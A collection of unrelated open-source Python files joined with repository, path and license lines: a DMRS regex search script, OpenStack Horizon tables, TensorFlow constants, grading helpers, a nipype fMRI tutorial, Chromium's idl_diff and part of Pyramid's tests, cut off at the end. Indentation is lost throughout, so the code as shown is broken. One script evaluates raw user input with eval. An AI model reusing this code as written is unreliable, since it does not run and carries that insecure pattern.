lem_6=eval(raw_input())
if lem_3.isdigit():
lem_3=int(lem_3)
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%u\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+ind=\"\+|-"\s+num=\"%s\"\s+pers=\"%u\"' %(lem_1,lem_2,lem_3,lem_5,lem_6)
else:
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%s\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+num=\"%s\"\s+pers=\"%u\"' %(lem_1,lem_2,lem_3,lem_5,lem_6)
# for realpred-e checking
elif que is 5:
print "Cvarsort :e"
print"Check for lemma :\n1- With sense,\n2-without sense"
inp=eval(raw_input())
if inp is 1:
print "Enter the lemma whose value is to be checked:"
lem_1=raw_input()
print"pos:"
lem_2=raw_input()
print"sense:"
lem_3=raw_input()
print"mood:"
lem_4=raw_input()
print"perf:"
lem_5=raw_input()
print"prog:"
lem_6=raw_input()
print"sf:"
lem_7=raw_input()
print"tense:"
lem_8=raw_input()
if lem_3.isdigit():
lem_3=int(lem_3)
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%u\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6,lem_7,lem_8)
else:
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+sense=\"%s\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6,lem_7,lem_8)
elif inp is 2:
print "lemma:"
lem_1=raw_input()
print"pos:"
lem_2=raw_input()
print"mood:"
lem_3=raw_input()
print"perf:"
lem_4=raw_input()
print"prog:"
lem_5=raw_input()
print"sf:"
lem_6=raw_input()
print"tense:"
lem_7=raw_input()
reg=r'<realpred\s+lemma=\"%s\"\s+pos=\"%s\"\s+/><sortinfo\s+cvarsort=\"[a-z]\"\s+mood=\"%s\"\s+perf=\"%s\"\s+prog=\"%s\"\s+sf=\"%s\"\s+tense=\"%s\"' %(lem_1,lem_2,lem_3,lem_4,lem_5,lem_6,lem_7)
#general search/match space for all cases.
for filename in sorted(os.listdir(path)):
matches = re.search(srr,filename)
if matches:
#change directory to dmrs files direct.
os.chdir('/home/naman/ace-0.9.24/output')
fil=open(filename,"r")
test_str=fil.read()
#check for match in the current dmrs file
matches = re.search(reg,test_str,re.IGNORECASE)
if matches:
ans_fil.append(fil.name)
fil.close
for a in ans_fil:
print a
if not ans_fil:
print "No DMRS FILE WITH DESIRED CHARACTERS."
ff()
| mit |
DPaaS-Raksha/horizon | openstack_dashboard/dashboards/admin/info/tables.py | 9 | 2161 | import logging
from django.utils.translation import ugettext_lazy as _
from horizon import tables
LOG = logging.getLogger(__name__)
class QuotaFilterAction(tables.FilterAction):
def filter(self, table, tenants, filter_string):
q = filter_string.lower()
def comp(tenant):
if q in tenant.name.lower():
return True
return False
return filter(comp, tenants)
def get_quota_name(quota):
return quota.name.replace("_", " ").title()
class QuotasTable(tables.DataTable):
name = tables.Column(get_quota_name, verbose_name=_('Quota Name'))
limit = tables.Column("limit", verbose_name=_('Limit'))
def get_object_id(self, obj):
return obj.name
class Meta:
name = "quotas"
verbose_name = _("Quotas")
table_actions = (QuotaFilterAction,)
multi_select = False
class ServiceFilterAction(tables.FilterAction):
def filter(self, table, services, filter_string):
q = filter_string.lower()
def comp(service):
if q in service.type.lower():
return True
return False
return filter(comp, services)
def get_stats(service):
return template.loader.render_to_string('admin/services/_stats.html',
{'service': service})
def get_enabled(service, reverse=False):
options = ["Enabled", "Disabled"]
if reverse:
options.reverse()
return options[0] if not service.disabled else options[1]
class ServicesTable(tables.DataTable):
id = tables.Column('id', verbose_name=_('Id'), hidden=True)
name = tables.Column("name", verbose_name=_('Name'))
service_type = tables.Column('__unicode__', verbose_name=_('Service'))
host = tables.Column('host', verbose_name=_('Host'))
enabled = tables.Column(get_enabled,
verbose_name=_('Enabled'),
status=True)
class Meta:
name = "services"
verbose_name = _("Services")
table_actions = (ServiceFilterAction,)
multi_select = False
status_columns = ["enabled"]
| apache-2.0 |
cg31/tensorflow | tensorflow/contrib/tensor_forest/python/constants.py | 30 | 1062 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Constants used by tensorforest. Some of these map to values in C++ ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# If tree[i][0] equals this value, then i is a leaf node.
LEAF_NODE = -1
# Data column types for indicating categorical or other non-float values.
DATA_FLOAT = 0
DATA_CATEGORICAL = 1
| apache-2.0 |
dpeters19/webassign2 | science_utils.py | 1 | 2996 | import re
def is_hyper_scientific(number):
""" Determines if an answer is hyper-scientific
Args:
number (String)
Returns:
bool: True if is hyper-scientific, False otherwise
Example:
>>> is_hyper_scientific("1.00e2")
True
>>> is_hyper_scientific("100")
False
>>> is_hyper_scientific("1.234e5")
False
"""
pattern = r"\d\.\d{2}e\d{1,}"
if re.search(pattern, number) is not None:
if number[0] != "0": # First number should never be zero
return True
return False
def convert_to_scientific_notation(number):
""" Converts a number to scientific notation
Args:
number (float)
Returns:
String
Example:
>>> convert_to_scientific_notation(5)
'5.00e0'
>>> convert_to_scientific_notation(10)
'1.00e1'
>>> convert_to_scientific_notation(-100)
'-1.00e2'
>>> convert_to_scientific_notation(0.01)
'1.00e-2'
"""
number = "%.2e" % number
if "+" in number:
positive = True
number, exponent = number.split("+")
else:
positive = False
number, exponent = number.split("-")
exponent = str(int(exponent)) # Removes leading zeros
if positive:
return number + exponent
else:
return number + "-" + exponent
def is_acceptable_answer(correct_answer, response):
""" Calculates if an answer is an acceptable distance from the correct answer
Args:
correct_answer (float)
response (String)
Returns:
bool: True of the answer is an acceptable answer, false otherwise
Examples:
>>> is_acceptable_answer(100, '1.00e2')
True
>>> is_acceptable_answer(100, '1.01e2')
True
>>> is_acceptable_answer(100, '1.02e2')
False
"""
# TODO Handle errors better with loop
try:
correct_answer = convert_to_scientific_notation(int(correct_answer))
except ValueError as ve:
print(ve.args)
number, exponent = correct_answer.split("e")
number = float(number)
max_number = number + .01
min_number = number - .01
max_number = str(max_number) + "e" + exponent
min_number = str(min_number) + "e" + exponent
min_number = int(float(min_number))
max_number = int(float(max_number))
if min_number <= int(float(response)) <= max_number:
return True
return False
def multiple_replace(text, variable_dict):
"""
Args:
text (str): The text to replace keys with values
variable_dict (dict): The dictionary that holds the keys and values
Returns:
str: Text with the keys replaced with values
Examples:
>>> multiple_replace("A B C a b c", {"a":10, "A": 10})
'10 B C 10 b c'
"""
for key in variable_dict:
text = text.replace(key, str(variable_dict[key]))
return text
| mit |
grlee77/nipype | examples/fmri_spm.py | 9 | 16091 | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
==============
fMRI: SPM, FSL
==============
The fmri_spm.py integrates several interfaces to perform a first
and second level analysis on a two-subject data set. The tutorial can
be found in the examples folder. Run the tutorial from inside the
nipype tutorial directory::
python fmri_spm.py
Import necessary modules from nipype."""
import os # system functions
from nipype import config
#config.enable_provenance()
from nipype.interfaces import spm, fsl
# In order to use this example with SPM's matlab common runtime
# matlab_cmd = ('/Users/satra/Downloads/spm8/run_spm8.sh '
# '/Applications/MATLAB/MATLAB_Compiler_Runtime/v713/ script')
# spm.SPMCommand.set_mlab_paths(matlab_cmd=matlab_cmd, use_mcr=True)
import nipype.interfaces.io as nio # Data i/o
import nipype.interfaces.utility as util # utility
import nipype.pipeline.engine as pe # pypeline engine
import nipype.algorithms.rapidart as ra # artifact detection
import nipype.algorithms.modelgen as model # model specification
import nipype.interfaces.matlab as mlab
"""
Preliminaries
-------------
Set any package specific configuration. The output file format
for FSL routines is being set to uncompressed NIFTI and a specific
version of matlab is being used. The uncompressed format is required
because SPM does not handle compressed NIFTI.
"""
# Tell fsl to generate all output in uncompressed nifti format
fsl.FSLCommand.set_default_output_type('NIFTI')
# Set the way matlab should be called
# import nipype.interfaces.matlab as mlab # how to run matlab
# mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash")
# In case a different path is required
# mlab.MatlabCommand.set_default_paths('/software/matlab/spm12b/spm12b_r5918')
"""The nipype tutorial contains data for two subjects. Subject data
is in two subdirectories, ``s1`` and ``s2``. Each subject directory
contains four functional volumes: f3.nii, f5.nii, f7.nii, f10.nii. And
one anatomical volume named struct.nii.
Below we set some variables to inform the ``datasource`` about the
layout of our data. We specify the location of the data, the subject
sub-directories and a dictionary that maps each run to a mnemonic (or
field) for the run type (``struct`` or ``func``). These fields become
the output fields of the ``datasource`` node in the pipeline.
In the example below, run 'f3' is of type 'func' and gets mapped to a
nifti filename through a template '%s.nii'. So 'f3' would become
'f3.nii'.
"""
# Specify the location of the data.
data_dir = os.path.abspath('data')
# Specify the subject directories
subject_list = ['s1', 's3']
# Map field names to individual subject runs.
info = dict(func=[['subject_id', ['f3','f5','f7','f10']]],
struct=[['subject_id','struct']])
infosource = pe.Node(interface=util.IdentityInterface(fields=['subject_id']),
name="infosource")
"""Here we set up iteration over all the subjects. The following line
is a particular example of the flexibility of the system. The
``datasource`` attribute ``iterables`` tells the pipeline engine that
it should repeat the analysis on each of the items in the
``subject_list``. In the current example, the entire first level
preprocessing and estimation will be repeated for each subject
contained in subject_list.
"""
infosource.iterables = ('subject_id', subject_list)
"""
Preprocessing pipeline nodes
----------------------------
Now we create a :class:`nipype.interfaces.io.DataSource` object and
fill in the information from above about the layout of our data. The
:class:`nipype.pipeline.NodeWrapper` module wraps the interface object
and provides additional housekeeping and pipeline specific
functionality.
"""
datasource = pe.Node(interface=nio.DataGrabber(infields=['subject_id'],
outfields=['func', 'struct']),
name = 'datasource')
datasource.inputs.base_directory = data_dir
datasource.inputs.template = '%s/%s.nii'
datasource.inputs.template_args = info
datasource.inputs.sort_filelist = True
"""Use :class:`nipype.interfaces.spm.Realign` for motion correction
and register all images to the mean image.
"""
realign = pe.Node(interface=spm.Realign(), name="realign")
realign.inputs.register_to_mean = True
"""Use :class:`nipype.algorithms.rapidart` to determine which of the
images in the functional series are outliers based on deviations in
intensity or movement.
"""
art = pe.Node(interface=ra.ArtifactDetect(), name="art")
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'SPM'
"""Skull strip structural images using
:class:`nipype.interfaces.fsl.BET`.
"""
skullstrip = pe.Node(interface=fsl.BET(), name="skullstrip")
skullstrip.inputs.mask = True
"""Use :class:`nipype.interfaces.spm.Coregister` to perform a rigid
body registration of the functional data to the structural data.
"""
coregister = pe.Node(interface=spm.Coregister(), name="coregister")
coregister.inputs.jobtype = 'estimate'
"""Warp functional and structural data to SPM's T1 template using
:class:`nipype.interfaces.spm.Normalize`. The tutorial data set
includes the template image, T1.nii.
"""
normalize = pe.Node(interface=spm.Normalize(), name = "normalize")
normalize.inputs.template = os.path.abspath('data/T1.nii')
"""Smooth the functional data using
:class:`nipype.interfaces.spm.Smooth`.
"""
smooth = pe.Node(interface=spm.Smooth(), name = "smooth")
fwhmlist = [4]
smooth.iterables = ('fwhm',fwhmlist)
"""
Set up analysis components
--------------------------
Here we create a function that returns subject-specific information
about the experimental paradigm. This is used by the
:class:`nipype.interfaces.spm.SpecifyModel` to create the information
necessary to generate an SPM design matrix. In this tutorial, the same
paradigm was used for every participant.
"""
def subjectinfo(subject_id):
from nipype.interfaces.base import Bunch
from copy import deepcopy
print "Subject ID: %s\n"%str(subject_id)
output = []
names = ['Task-Odd','Task-Even']
for r in range(4):
onsets = [range(15,240,60),range(45,240,60)]
output.insert(r,
Bunch(conditions=names,
onsets=deepcopy(onsets),
durations=[[15] for s in names]))
return output
"""Setup the contrast structure that needs to be evaluated. This is a
list of lists. The inner list specifies the contrasts and has the
following format - [Name,Stat,[list of condition names],[weights on
those conditions]. The condition names must match the `names` listed
in the `subjectinfo` function described above.
"""
cont1 = ('Task>Baseline','T', ['Task-Odd','Task-Even'],[0.5,0.5])
cont2 = ('Task-Odd>Task-Even','T', ['Task-Odd','Task-Even'],[1,-1])
contrasts = [cont1,cont2]
"""Generate SPM-specific design information using
:class:`nipype.interfaces.spm.SpecifyModel`.
"""
modelspec = pe.Node(interface=model.SpecifySPMModel(), name= "modelspec")
modelspec.inputs.concatenate_runs = False
modelspec.inputs.input_units = 'secs'
modelspec.inputs.output_units = 'secs'
modelspec.inputs.time_repetition = 3.
modelspec.inputs.high_pass_filter_cutoff = 120
"""Generate a first level SPM.mat file for analysis
:class:`nipype.interfaces.spm.Level1Design`.
"""
level1design = pe.Node(interface=spm.Level1Design(), name= "level1design")
level1design.inputs.timing_units = modelspec.inputs.output_units
level1design.inputs.interscan_interval = modelspec.inputs.time_repetition
level1design.inputs.bases = {'hrf':{'derivs': [0,0]}}
"""Use :class:`nipype.interfaces.spm.EstimateModel` to determine the
parameters of the model.
"""
level1estimate = pe.Node(interface=spm.EstimateModel(), name="level1estimate")
level1estimate.inputs.estimation_method = {'Classical' : 1}
"""Use :class:`nipype.interfaces.spm.EstimateContrast` to estimate the
first level contrasts specified in a few steps above.
"""
contrastestimate = pe.Node(interface = spm.EstimateContrast(), name="contrastestimate")
contrastestimate.inputs.contrasts = contrasts
contrastestimate.overwrite = True
contrastestimate.config = {'execution': {'remove_unnecessary_outputs': False}}
"""
Setup the pipeline
------------------
The nodes created above do not describe the flow of data. They merely
describe the parameters used for each function. In this section we
setup the connections between the nodes such that appropriate outputs
from nodes are piped into appropriate inputs of other nodes.
Use the :class:`nipype.pipeline.engine.Pipeline` to create a
graph-based execution pipeline for first level analysis. The config
options tells the pipeline engine to use `workdir` as the disk
location to use when running the processes and keeping their
outputs. The `use_parameterized_dirs` tells the engine to create
sub-directories under `workdir` corresponding to the iterables in the
pipeline. Thus for this pipeline there will be subject specific
sub-directories.
The ``nipype.pipeline.engine.Pipeline.connect`` function creates the
links between the processes, i.e., how data should flow in and out of
the processing nodes.
"""
l1pipeline = pe.Workflow(name="level1")
l1pipeline.base_dir = os.path.abspath('spm_tutorial/workingdir')
l1pipeline.connect([(infosource, datasource, [('subject_id', 'subject_id')]),
(datasource,realign,[('func','in_files')]),
(realign,coregister,[('mean_image', 'source'),
('realigned_files','apply_to_files')]),
(datasource,coregister,[('struct', 'target')]),
(datasource,normalize,[('struct', 'source')]),
(coregister, normalize, [('coregistered_files','apply_to_files')]),
(normalize, smooth, [('normalized_files', 'in_files')]),
(infosource,modelspec,[(('subject_id', subjectinfo),
'subject_info')]),
(realign,modelspec,[('realignment_parameters','realignment_parameters')]),
(smooth,modelspec,[('smoothed_files','functional_runs')]),
(normalize,skullstrip,[('normalized_source','in_file')]),
(realign,art,[('realignment_parameters','realignment_parameters')]),
(normalize,art,[('normalized_files','realigned_files')]),
(skullstrip,art,[('mask_file','mask_file')]),
(art,modelspec,[('outlier_files','outlier_files')]),
(modelspec,level1design,[('session_info','session_info')]),
(skullstrip,level1design,[('mask_file','mask_image')]),
(level1design,level1estimate,[('spm_mat_file','spm_mat_file')]),
(level1estimate,contrastestimate,[('spm_mat_file','spm_mat_file'),
('beta_images','beta_images'),
('residual_image','residual_image')]),
])
"""
Setup storage results
---------------------
Use :class:`nipype.interfaces.io.DataSink` to store selected outputs
from the pipeline in a specific location. This allows the user to
selectively choose important output bits from the analysis and keep
them.
The first step is to create a datasink node and then to connect
outputs from the modules above to storage locations. These take the
following form directory_name[.[@]subdir] where parts between [] are
optional. For example 'realign.@mean' below creates a directory called
realign in 'l1output/subject_id/' and stores the mean image output
from the Realign process in the realign directory. If the @ is left
out, then a sub-directory with the name 'mean' would be created and
the mean image would be copied to that directory.
"""
datasink = pe.Node(interface=nio.DataSink(), name="datasink")
datasink.inputs.base_directory = os.path.abspath('spm_tutorial/l1output')
def getstripdir(subject_id):
import os
return os.path.join(os.path.abspath('spm_tutorial/workingdir'),'_subject_id_%s' % subject_id)
# store relevant outputs from various stages of the 1st level analysis
l1pipeline.connect([(infosource,datasink,[('subject_id','container'),
(('subject_id', getstripdir),'strip_dir')]),
(realign,datasink,[('mean_image','realign.@mean'),
('realignment_parameters','realign.@param')]),
(art,datasink,[('outlier_files','art.@outliers'),
('statistic_files','art.@stats')]),
(level1design,datasink,[('spm_mat_file','model.pre-estimate')]),
(level1estimate,datasink,[('spm_mat_file','model.@spm'),
('beta_images','model.@beta'),
('mask_image','model.@mask'),
('residual_image','model.@res'),
('RPVimage','model.@rpv')]),
(contrastestimate,datasink,[('con_images','contrasts.@con'),
('spmT_images','contrasts.@T')]),
])
"""
Setup level 2 pipeline
----------------------
Use :class:`nipype.interfaces.io.DataGrabber` to extract the contrast
images across a group of first level subjects. Unlike the previous
pipeline that iterated over subjects, this pipeline will iterate over
contrasts.
"""
# collect all the con images for each contrast.
contrast_ids = range(1,len(contrasts)+1)
l2source = pe.Node(nio.DataGrabber(infields=['fwhm', 'con']), name="l2source")
# we use .*i* to capture both .img (SPM8) and .nii (SPM12)
l2source.inputs.template=os.path.abspath('spm_tutorial/l1output/*/con*/*/_fwhm_%d/con_%04d.*i*')
# iterate over all contrast images
l2source.iterables = [('fwhm',fwhmlist),
('con',contrast_ids)]
l2source.inputs.sort_filelist = True
"""Use :class:`nipype.interfaces.spm.OneSampleTTestDesign` to perform a
simple statistical analysis of the contrasts from the group of
subjects (n=2 in this example).
"""
# setup a 1-sample t-test node
onesamplettestdes = pe.Node(interface=spm.OneSampleTTestDesign(), name="onesampttestdes")
l2estimate = pe.Node(interface=spm.EstimateModel(), name="level2estimate")
l2estimate.inputs.estimation_method = {'Classical' : 1}
l2conestimate = pe.Node(interface = spm.EstimateContrast(), name="level2conestimate")
cont1 = ('Group','T', ['mean'],[1])
l2conestimate.inputs.contrasts = [cont1]
l2conestimate.inputs.group_contrast = True
"""As before, we setup a pipeline to connect these two nodes (l2source
-> onesamplettest).
"""
l2pipeline = pe.Workflow(name="level2")
l2pipeline.base_dir = os.path.abspath('spm_tutorial/l2output')
l2pipeline.connect([(l2source,onesamplettestdes,[('outfiles','in_files')]),
(onesamplettestdes,l2estimate,[('spm_mat_file','spm_mat_file')]),
(l2estimate,l2conestimate,[('spm_mat_file','spm_mat_file'),
('beta_images','beta_images'),
('residual_image','residual_image')]),
])
"""
Execute the pipeline
--------------------
The code discussed above sets up all the necessary data structures
with appropriate parameters and the connectivity between the
processes, but does not generate any output. To actually run the
analysis on the data the ``nipype.pipeline.engine.Pipeline.Run``
function needs to be called.
"""
if __name__ == '__main__':
l1pipeline.run('MultiProc')
l2pipeline.run('MultiProc')
| bsd-3-clause |
hgl888/chromium-crosswalk-efl | ppapi/generators/idl_diff.py | 180 | 9073 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import subprocess
import sys
from idl_option import GetOption, Option, ParseOptions
from idl_outfile import IDLOutFile
#
# IDLDiff
#
# IDLDiff is a tool for comparing sets of IDL generated header files
# with the standard checked in headers. It does this by capturing the
# output of the standard diff tool, parsing it into separate changes, then
# ignoring changes that are know to be safe, such as adding or removing
# blank lines, etc...
#
Option('gen', 'IDL generated files', default='hdir')
Option('src', 'Original ".h" files', default='../c')
Option('halt', 'Stop if a difference is found')
Option('diff', 'Directory holding acceptable diffs', default='diff')
Option('ok', 'Write out the diff file.')
# Change
#
# A Change object contains the previous lines, new news and change type.
#
class Change(object):
def __init__(self, mode, was, now):
self.mode = mode
self.was = was
self.now = now
def Dump(self):
if not self.was:
print 'Adding %s' % self.mode
elif not self.now:
print 'Missing %s' % self.mode
else:
print 'Modifying %s' % self.mode
for line in self.was:
print 'src: >>%s<<' % line
for line in self.now:
print 'gen: >>%s<<' % line
print
#
# IsCopyright
#
# Return True if this change is only a one line change in the copyright notice
# such as non-matching years.
#
def IsCopyright(change):
if len(change.now) != 1 or len(change.was) != 1: return False
if 'Copyright (c)' not in change.now[0]: return False
if 'Copyright (c)' not in change.was[0]: return False
return True
#
# IsBlankComment
#
# Return True if this change only removes a blank line from a comment
#
def IsBlankComment(change):
if change.now: return False
if len(change.was) != 1: return False
if change.was[0].strip() != '*': return False
return True
#
# IsBlank
#
# Return True if this change only adds or removes blank lines
#
def IsBlank(change):
for line in change.now:
if line: return False
for line in change.was:
if line: return False
return True
#
# IsCppComment
#
# Return True if this change only going from C++ to C style
#
def IsToCppComment(change):
if not len(change.now) or len(change.now) != len(change.was):
return False
for index in range(len(change.now)):
was = change.was[index].strip()
if was[:2] != '//':
return False
was = was[2:].strip()
now = change.now[index].strip()
if now[:2] != '/*':
return False
now = now[2:-2].strip()
if now != was:
return False
return True
return True
def IsMergeComment(change):
if len(change.was) != 1: return False
if change.was[0].strip() != '*': return False
for line in change.now:
stripped = line.strip()
if stripped != '*' and stripped[:2] != '/*' and stripped[-2:] != '*/':
return False
return True
#
# IsSpacing
#
# Return True if this change is only different in the way 'words' are spaced
# such as in an enum:
# ENUM_XXX = 1,
# ENUM_XYY_Y = 2,
# vs
# ENUM_XXX = 1,
# ENUM_XYY_Y = 2,
#
def IsSpacing(change):
if len(change.now) != len(change.was): return False
for i in range(len(change.now)):
# Also ignore right side comments
line = change.was[i]
offs = line.find('//')
if offs == -1:
offs = line.find('/*')
if offs >-1:
line = line[:offs-1]
words1 = change.now[i].split()
words2 = line.split()
if words1 != words2: return False
return True
#
# IsInclude
#
# Return True if change has extra includes
#
def IsInclude(change):
for line in change.was:
if line.strip().find('struct'): return False
for line in change.now:
if line and '#include' not in line: return False
return True
#
# IsCppComment
#
# Return True if the change is only missing C++ comments
#
def IsCppComment(change):
if len(change.now): return False
for line in change.was:
line = line.strip()
if line[:2] != '//': return False
return True
#
# ValidChange
#
# Return True if none of the changes does not patch an above "bogus" change.
#
def ValidChange(change):
if IsToCppComment(change): return False
if IsCopyright(change): return False
if IsBlankComment(change): return False
if IsMergeComment(change): return False
if IsBlank(change): return False
if IsSpacing(change): return False
if IsInclude(change): return False
if IsCppComment(change): return False
return True
#
# Swapped
#
# Check if the combination of last + next change signals they are both
# invalid such as swap of line around an invalid block.
#
def Swapped(last, next):
if not last.now and not next.was and len(last.was) == len(next.now):
cnt = len(last.was)
for i in range(cnt):
match = True
for j in range(cnt):
if last.was[j] != next.now[(i + j) % cnt]:
match = False
break;
if match: return True
if not last.was and not next.now and len(last.now) == len(next.was):
cnt = len(last.now)
for i in range(cnt):
match = True
for j in range(cnt):
if last.now[i] != next.was[(i + j) % cnt]:
match = False
break;
if match: return True
return False
def FilterLinesIn(output):
was = []
now = []
filter = []
for index in range(len(output)):
filter.append(False)
line = output[index]
if len(line) < 2: continue
if line[0] == '<':
if line[2:].strip() == '': continue
was.append((index, line[2:]))
elif line[0] == '>':
if line[2:].strip() == '': continue
now.append((index, line[2:]))
for windex, wline in was:
for nindex, nline in now:
if filter[nindex]: continue
if filter[windex]: continue
if wline == nline:
filter[nindex] = True
filter[windex] = True
if GetOption('verbose'):
print "Found %d, %d >>%s<<" % (windex + 1, nindex + 1, wline)
out = []
for index in range(len(output)):
if not filter[index]:
out.append(output[index])
return out
#
# GetChanges
#
# Parse the output into discrete change blocks.
#
def GetChanges(output):
# Split on lines, adding an END marker to simply add logic
lines = output.split('\n')
lines = FilterLinesIn(lines)
lines.append('END')
changes = []
was = []
now = []
mode = ''
last = None
for line in lines:
# print "LINE=%s" % line
if not line: continue
elif line[0] == '<':
if line[2:].strip() == '': continue
# Ignore prototypes
if len(line) > 10:
words = line[2:].split()
if len(words) == 2 and words[1][-1] == ';':
if words[0] == 'struct' or words[0] == 'union':
continue
was.append(line[2:])
elif line[0] == '>':
if line[2:].strip() == '': continue
if line[2:10] == '#include': continue
now.append(line[2:])
elif line[0] == '-':
continue
else:
change = Change(line, was, now)
was = []
now = []
if ValidChange(change):
changes.append(change)
if line == 'END':
break
return FilterChanges(changes)
def FilterChanges(changes):
if len(changes) < 2: return changes
out = []
filter = [False for change in changes]
for cur in range(len(changes)):
for cmp in range(cur+1, len(changes)):
if filter[cmp]:
continue
if Swapped(changes[cur], changes[cmp]):
filter[cur] = True
filter[cmp] = True
for cur in range(len(changes)):
if filter[cur]: continue
out.append(changes[cur])
return out
def Main(args):
filenames = ParseOptions(args)
if not filenames:
gendir = os.path.join(GetOption('gen'), '*.h')
filenames = sorted(glob.glob(gendir))
srcdir = os.path.join(GetOption('src'), '*.h')
srcs = sorted(glob.glob(srcdir))
for name in srcs:
name = os.path.split(name)[1]
name = os.path.join(GetOption('gen'), name)
if name not in filenames:
print 'Missing: %s' % name
for filename in filenames:
gen = filename
filename = filename[len(GetOption('gen')) + 1:]
src = os.path.join(GetOption('src'), filename)
diff = os.path.join(GetOption('diff'), filename)
p = subprocess.Popen(['diff', src, gen], stdout=subprocess.PIPE)
output, errors = p.communicate()
try:
input = open(diff, 'rt').read()
except:
input = ''
if input != output:
changes = GetChanges(output)
else:
changes = []
if changes:
print "\n\nDelta between:\n src=%s\n gen=%s\n" % (src, gen)
for change in changes:
change.Dump()
print 'Done with %s\n\n' % src
if GetOption('ok'):
open(diff, 'wt').write(output)
if GetOption('halt'):
return 1
else:
print "\nSAME:\n src=%s\n gen=%s" % (src, gen)
if input: print ' ** Matched expected diff. **'
print '\n'
if __name__ == '__main__':
sys.exit(Main(sys.argv[1:]))
| bsd-3-clause |
gamesbrewer/kegger | kegger/myapp/libs/pyramid/tests/test_integration.py | 2 | 27516 | # -*- coding: utf-8 -*-
import datetime
import locale
import os
import unittest
from pyramid.wsgi import wsgiapp
from pyramid.view import view_config
from pyramid.static import static_view
from pyramid.compat import (
text_,
url_quote,
)
from zope.interface import Interface
# 5 years from now (more or less)
fiveyrsfuture = datetime.datetime.utcnow() + datetime.timedelta(5*365)
defaultlocale = locale.getdefaultlocale()[1]
class INothing(Interface):
pass
@view_config(for_=INothing)
@wsgiapp
def wsgiapptest(environ, start_response):
""" """
return '123'
class WGSIAppPlusViewConfigTests(unittest.TestCase):
def test_it(self):
from venusian import ATTACH_ATTR
import types
self.assertTrue(getattr(wsgiapptest, ATTACH_ATTR))
self.assertTrue(type(wsgiapptest) is types.FunctionType)
context = DummyContext()
request = DummyRequest()
result = wsgiapptest(context, request)
self.assertEqual(result, '123')
def test_scanned(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IView
from pyramid.interfaces import IViewClassifier
from pyramid.config import Configurator
from pyramid.tests import test_integration
config = Configurator()
config.scan(test_integration)
config.commit()
reg = config.registry
view = reg.adapters.lookup(
(IViewClassifier, IRequest, INothing), IView, name='')
self.assertEqual(view.__original_view__, wsgiapptest)
class IntegrationBase(object):
root_factory = None
package = None
def setUp(self):
from pyramid.config import Configurator
config = Configurator(root_factory=self.root_factory,
package=self.package)
config.include(self.package)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
here = os.path.dirname(__file__)
class StaticAppBase(IntegrationBase):
def test_basic(self):
res = self.testapp.get('/minimal.txt', status=200)
_assertBody(res.body, os.path.join(here, 'fixtures/minimal.txt'))
def test_hidden(self):
res = self.testapp.get('/static/.hiddenfile', status=200)
_assertBody(res.body, os.path.join(here, 'fixtures/static/.hiddenfile'))
if defaultlocale is not None:
# These tests are expected to fail on LANG=C systems due to decode
# errors and on non-Linux systems due to git highchar handling
# vagaries
def test_highchars_in_pathelement(self):
path = os.path.join(
here,
text_('fixtures/static/héhé/index.html', 'utf-8'))
pathdir = os.path.dirname(path)
body = b'<html>hehe</html>\n'
try:
os.makedirs(pathdir)
with open(path, 'wb') as fp:
fp.write(body)
url = url_quote('/static/héhé/index.html')
res = self.testapp.get(url, status=200)
self.assertEqual(res.body, body)
finally:
os.unlink(path)
os.rmdir(pathdir)
def test_highchars_in_filename(self):
path = os.path.join(
here,
text_('fixtures/static/héhé.html', 'utf-8'))
body = b'<html>hehe file</html>\n'
with open(path, 'wb') as fp:
fp.write(body)
try:
url = url_quote('/static/héhé.html')
res = self.testapp.get(url, status=200)
self.assertEqual(res.body, body)
finally:
os.unlink(path)
def test_not_modified(self):
self.testapp.extra_environ = {
'HTTP_IF_MODIFIED_SINCE':httpdate(fiveyrsfuture)}
res = self.testapp.get('/minimal.txt', status=304)
self.assertEqual(res.body, b'')
def test_file_in_subdir(self):
fn = os.path.join(here, 'fixtures/static/index.html')
res = self.testapp.get('/static/index.html', status=200)
_assertBody(res.body, fn)
def test_directory_noslash_redir(self):
res = self.testapp.get('/static', status=301)
self.assertEqual(res.headers['Location'], 'http://localhost/static/')
def test_directory_noslash_redir_preserves_qs(self):
res = self.testapp.get('/static?a=1&b=2', status=301)
self.assertEqual(res.headers['Location'],
'http://localhost/static/?a=1&b=2')
def test_directory_noslash_redir_with_scriptname(self):
self.testapp.extra_environ = {'SCRIPT_NAME':'/script_name'}
res = self.testapp.get('/static', status=301)
self.assertEqual(res.headers['Location'],
'http://localhost/script_name/static/')
def test_directory_withslash(self):
